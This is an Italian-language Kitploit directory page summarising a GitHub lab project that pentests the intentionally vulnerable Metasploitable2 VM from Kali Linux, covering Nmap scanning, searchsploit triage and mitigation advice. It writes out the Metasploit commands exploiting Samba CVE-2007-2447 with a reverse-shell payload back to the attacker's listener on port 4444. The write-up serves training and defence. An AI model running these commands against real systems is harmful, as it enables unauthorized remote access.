Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Penetration-Testing-on-Metasploitable2 — Progetto pratico di pentest utilizzando Kali Linux vs Metasploitable2. Include flusso di lavoro completo: scansione con Nmap, enumerazione, exploit con Metasploit (Samba CVE-2007-2447), validazione post-exploit e fasi di mitigazione. Il repository contiene comandi, output e un report che mostra sia tecniche offensive che raccomandazioni difensive. | Kitploit
Strumenti/GitHubGitHub/seifeldienahmad/penetration-testing-on-metasploitable2
RicognizioneScanner di VulnerabilitàMappatura della ReteAnalisi delle VulnerabilitàExploitPost-ExploitPenetration TestingApprendimento e FormazioneLab e Pratica

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
GitHubseifeldienahmad/penetration-testing-on-metasploitable2

Penetration-Testing-on-Metasploitable2

Vedi RepositorySito web
111 mesi faNon ancora revisionato

Informazioni

Progetto pratico di pentest utilizzando Kali Linux vs Metasploitable2. Include flusso di lavoro completo: scansione con Nmap, enumerazione, exploit con Metasploit (Samba CVE-2007-2447), validazione post-exploit e fasi di mitigazione. Il repository contiene comandi, output e un report che mostra sia tecniche offensive che raccomandazioni difensive.

Condividi

Progetto Stage 2 — Test di Penetrazione su Metasploitable2

  • Riepilogo: Questo progetto dimostra un flusso di lavoro completo di test di penetrazione: ricognizione, enumerazione, sfruttamento, validazione post-sfruttamento e raccomandazioni di mitigazione. Il target utilizzato è Metasploitable2 e la macchina attaccante è Kali Linux.

  • Strumenti: Kali Linux (attaccante) Nmap (ricognizione) Metasploit Framework (sfruttamento) SearchSploit / Exploit-DB (triage)

Passaggi eseguiti:

  1. Scansione: sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x Servizi identificati (esempi): vsftpd 2.3.4 (porta 21 banner), Samba smbd 3.x (porta 445).
  2. Enumerazione e Triage: searchsploit --nmap scans/target.xml searchsploit samba 3.0.20 Servizi abbinati a potenziali exploit (backdoor vsftpd, mappa utenti Samba).
  3. Sfruttamento
  • Backdoor vsftpd (CVE-2011-2523) tentata — Banner Nmap presente ma servizio non reattivo; l'exploit non ha creato una sessione.
  • Samba (CVE-2007-2447) sfruttato con successo: msfconsole use exploit/multi/samba/usermap_script set RHOSTS 192.168.x.x set payload cmd/unix/reverse set LHOST <kali-ip> set LPORT 4444 exploit Ottenuta una shell interattiva e validato il contesto utente.
  1. Post-Sfruttamento
  • Verificate informazioni di sistema: id uname -a
  • Raccolte prove e screenshot.
  1. Raccomandazioni di Mitigazione
  • Scansione regolare e inventario delle risorse.
  • Aggiornamenti tempestivi e upgrade delle versioni (aggiornare Samba).
  • Limitare l'accesso alle porte critiche (regole firewall).
  • Disattivare servizi inutilizzati e accesso anonimo.
  • Applicare il principio del minimo privilegio a condivisioni e account.
  • Segmentazione di rete e logging/monitoraggio.
  • Pianificazione della risposta agli incidenti.

Risultato Ottenuta con successo una shell remota tramite un exploit Samba, documentato il percorso di attacco e prodotto un piano di mitigazione. I log completi e gli output dei comandi sono archiviati nella cartella scans/.

Scarica lo strumento